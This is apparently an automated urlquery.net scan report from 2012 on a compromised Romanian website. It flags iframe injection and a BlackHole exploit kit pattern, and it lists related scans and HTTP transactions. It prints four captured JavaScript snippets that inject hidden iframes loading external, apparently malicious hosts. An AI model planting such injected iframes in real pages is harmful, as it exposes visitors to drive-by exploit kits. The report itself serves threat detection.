urlquery.net - Free url scanner

Overview

URL	http://danielboldan.transproject.ro/~rtra3104
IP	89.42.216.18
ASN	AS5606 GTS Telecom SRL
Location	Romania
Report completed	2012-11-06 07:11:19 CET
Status	Loading report..
urlQuery Alerts	Detected malicious iframe injection Detected BlackHole v1.x exploit kit URL pattern

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro	No alerts detected
Snort /w Sourcefire VRT	No alerts detected

Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 89.42.216.18

Date	Alerts / IDS	URL	IP
2013-02-11 17:05:19	1 / 3	http://danielboldan.transproject.ro/~rtra3104/	89.42.216.18
2013-01-07 22:58:20	1 / 1	http://california-co.ro/	89.42.216.18
2012-12-24 03:07:17	1 / 0	http://www.ambasadorband.ro/index.html	89.42.216.18
2012-12-09 06:59:38	2 / 2	http://hotel-roberto.ro/	89.42.216.18
2012-11-12 20:54:30	3 / 5	http://danielboldan.transproject.ro/	89.42.216.18
2012-11-07 05:20:07	1 / 0	http://ambasadorband.ro/	89.42.216.18

Last 6 reports on ASN: AS5606 GTS Telecom SRL

Date	Alerts / IDS	URL	IP
2013-02-14 16:56:35	0 / 3	http://img.youtube.com.internet3g.ro/rawk.php	89.42.219.146
2013-02-14 10:55:07	1 / 5	http://www.manufacturalorelai.ro/contact/	85.9.47.230
2013-02-14 10:54:52	1 / 5	http://manufacturalorelai.ro/contact	85.9.47.230
2013-02-14 10:30:28	0 / 0	http://www.catalog-piese.ro/js/jquery/fancybox/fancy_shadow_sw.png	89.42.216.167
2013-02-14 10:28:15	0 / 0	http://www.catalog-piese.ro/js/jquery/fancybox/fancy_shadow_s.png	89.42.216.167
2013-02-14 05:04:52	2 / 1	http://editurasimplu.ro/autori-romani-barbustefanescu-delavrancea-c-44_55=.html?products_id=226	89.42.219.205

Last 3 reports on domain: danielboldan.transproject.ro

Date	Alerts / IDS	URL	IP
2013-02-11 17:05:19	1 / 3	http://danielboldan.transproject.ro/~rtra3104/	89.42.216.18
2012-11-12 20:54:30	3 / 5	http://danielboldan.transproject.ro/	89.42.216.18
2012-11-06 23:35:33	2 / 0	http://danielboldan.transproject.ro/~rtra3104/	89.42.216.18

JavaScript

Executed Scripts (6)

Executed Evals (4)

#1 JavaScript::Eval (size: 617, repeated: 1)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://historuofthowers.com/main.php?page=4c8dc3486657031c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://historuofthowers.com/main.php?page=4c8dc3486657031c');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#2 JavaScript::Eval (size: 615, repeated: 1) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://ohioswingersbus.com/main.php?page=887c73c59dbbfc05' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://ohioswingersbus.com/main.php?page=887c73c59dbbfc05');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#3 JavaScript::Eval (size: 611, repeated: 1)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://storylootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://storylootybuz.com/main.php?page=6eb5b7677d651df4');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#4 JavaScript::Eval (size: 619, repeated: 1)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

Executed Writes (0)

HTTP Transactions (8)

Request	Response
GET /~rtra3104 HTTP/1.1 Host: danielboldan.transproject.ro User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 301 Moved Permanently Content-Type: text/html Date: Tue, 06 Nov 2012 06:10:43 GMT Connection: Keep-Alive Keep-Alive: timeout=5, max=100 Location: http://danielboldan.transproject.ro/~rtra3104/ Content-Length: 413
GET /favicon.ico HTTP/1.1 Host: danielboldan.transproject.ro User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 404 Not Found Content-Type: text/html Date: Tue, 06 Nov 2012 06:10:43 GMT Connection: Keep-Alive Keep-Alive: timeout=5, max=100 Cache-Control: private, no-cache, max-age=0 Pragma: no-cache Content-Length: 389
GET /favicon.ico HTTP/1.1 Host: danielboldan.transproject.ro User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 404 Not Found Content-Type: text/html Date: Tue, 06 Nov 2012 06:10:43 GMT Connection: Keep-Alive Keep-Alive: timeout=5, max=100 Cache-Control: private, no-cache, max-age=0 Pragma: no-cache Content-Length: 389
GET /favicon.ico HTTP/1.1 Host: danielboldan.transproject.ro User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 404 Not Found Content-Type: text/html Date: Tue, 06 Nov 2012 06:10:46 GMT Connection: Keep-Alive Keep-Alive: timeout=5, max=100 Cache-Control: private, no-cache, max-age=0 Pragma: no-cache Content-Length: 389
GET /~rtra3104/ HTTP/1.1 Host: danielboldan.transproject.ro User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Content-Encoding: gzip Vary: Accept-Encoding Date: Tue, 06 Nov 2012 06:10:43 GMT Accept-Ranges: bytes Connection: close Etag: "1f5c6-4fc4ba5f-0" Last-Modified: Tue, 29 May 2012 12:00:31 GMT Content-Length: 22052
GET /main.php?page=4d81d4c54d71b36c HTTP/1.1 Host: jahdivideoners.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://danielboldan.transproject.ro/~rtra3104/
GET /main.php?page=4c8dc3486657031c HTTP/1.1 Host: historuofthowers.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://danielboldan.transproject.ro/~rtra3104/
GET /~rtra3104/ HTTP/1.1 Host: danielboldan.transproject.ro User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Range: bytes=5808- If-Range: "1f5c6-4fc4ba5f-0"	HTTP/1.1 206 Partial Content Content-Type: text/html Date: Tue, 06 Nov 2012 06:10:43 GMT Accept-Ranges: bytes Connection: Keep-Alive Keep-Alive: timeout=5, max=100 Etag: "1f5c6-4fc4ba5f-0" Last-Modified: Tue, 29 May 2012 12:00:31 GMT Content-Range: bytes 5808-128453/128454 Content-Length: 122646